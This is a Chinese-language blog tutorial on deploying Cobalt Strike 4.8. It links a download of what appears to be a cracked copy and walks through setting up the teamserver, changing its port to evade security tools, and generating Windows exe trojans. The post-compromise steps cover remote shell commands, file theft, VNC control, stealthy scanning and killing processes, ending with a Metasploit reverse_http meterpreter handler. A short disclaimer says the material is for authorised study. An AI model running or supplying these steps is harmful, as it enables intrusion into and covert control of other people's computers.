链接:https://www.123865.com/s/r3gtVv-irWmH?pwd=wKfk

提取码:wKfk

1.服务端的安装和配置

1.下载安装包

下载我在网盘里分享的安装包,这里我用的是4.8的版本

链接:https://www.123865.com/s/r3gtVv-irWmH?pwd=wKfk

提取码:wKfk

解压下载后的压缩包,会有两个文件夹,Server和Client两个文件夹

cs-1.png

2.安装jdk

apt install openjdk-17-jdk

安装完如果执行java -version,代表java环境安装好了,可以进行下一步

3.服务端部署

我们把Server文件夹上传到linux,这里我推荐使用kalilinux,上传的目录没有限制,我个人习惯把它上传到/opt目录下

然后进入Server文件夹内,执行

chmod +x teamserver
chmod +x TeamServerImage

然后我们就可以执行启动了

./teamserver 192.168.68.128 test   //后面的ip地址是监听地址,这里填写kali的ip,test是设置的密码,我们可以自己设置其他密码

到这里我们服务端的部署就可以结束了,每次要使用cobalt strike的时候先把服务端启动,在用客户端去连接

tips:teamserver是一个启动脚本,里面默认写了服务端的启动参数,我们可以在里面修改一下端口,服务端默认启动监听的端口是50050,容易被一些安全工具拦截,修改最后一行 -Dcobaltstrike.server_port=50050,改成其他的端口即可,我修改成了55555。

2.客户端的安装和配置

1.安装

然后在windows上也安装好java环境,jdk11或者17都可以,打开client文件夹,双击Cobalt_Strike_CN.bat即可启动,可以按照我图片上的提示填写连接信息

cs-2.png

设置完成后我们就可以点击connect来连接服务端

2.创建监听器

cs-3.png
cs-4.png

3.生成木马

点击导航栏的有效载荷(快捷键alt+P),再点击windows可执行程序(E),选择刚刚创建的监听器,然后如果目标cpu是64架构的勾上x64,不勾就是x86架构的,output选择windows exe,再点击generate,选择一个位置保存我们生成的exe木马,当目标运行后就会上线

tips:还有一个windows可执行程序(stageless)两者区别就是windows可执行程序(E)可以持久运行,重启之后都可以上线,而windows可执行程序(stageless)运行在内存,重启之后就不会运行了

这里我们之所以有两个个会话是因为点击了两次木马

cs-5.png

4.目标上线后可执行的操作

1.进入对方的shell,执行命令

右键会话选择会话交互,cobaltstrike底部就会出现一个黑窗口可以交互,我们想要执行命令需要在每条命令的前面加上"shell",比如看对方ip就是shell ipconfig,和meterpreter一样,cs也内置了一些命令,我们可以输入查看有什么命令。

2.浏览文件、上传下载

右键会话点击浏览探测-->文件浏览即可上传下载文件、创建文件夹等

下载的文件在服务端的downloads里面,进去后发现下载的文件都是随机命名的,并不是和我们在对方电脑上的文件名一样

3.vnc远程控制

这里一定要注意服务端的third-party下的两个dll文件要完整(300kb左右),不然会导致vnc连接不断被重置,导致失败

cs-10.png

4.网络探测(包含端口扫描)

可以看看局域网内有什么共享的设备,比如打印机,nas存储等

cs-11.png
端口扫描:

可以使用arp或者icmp协议,都不容易被发现

cs-12.png

5.操作进程

我们可以杀死目标进程等

cs-9.png

5.如何安装插件

点击左上角的cobalt strike-->脚本管理器-->出现一个Scripts的标签页,点击load-->在选择插件目录的cna后缀文件,ready后面的对勾,表示添加成功,我们选中会话右键就可以使用插件的功能

cs-6.png

3.和msf联动

1.启动msf

在kali上输入msfconsole

2.创建foreign http监听

点击监听器,在Listenters选项卡中点击add

cs-7.png

3.配置msf参数

use exploit/multi/handler
set lport 2432
set lhost 192.168.168.128
set payload windows/meterpreter/reverse_http
run

lport要和上面填写的端口一致,lhost是kali的ip,run运行之后就会就会进入监听状态

4.cs连接

右键会话,点击凭证提权-->点击新建会话,在弹出的窗口中选择我们创建的foreign http,然后点击choose,此时msf就会由监听状态变成meterpreter,接下来就可以在kali的msf控制台上使用msf的相关命令了

cs-8.png

许可协议
> ⚠️ **安全声明** > > 本文仅供网络安全学习和研究使用,所有操作应在合法授权的环境下进行。 > 未经授权对他人系统进行渗透测试属于违法行为,请遵守《网络安全法》及相关法律法规。 > 作者不对任何非法使用本文内容造成的后果负责。
分享文章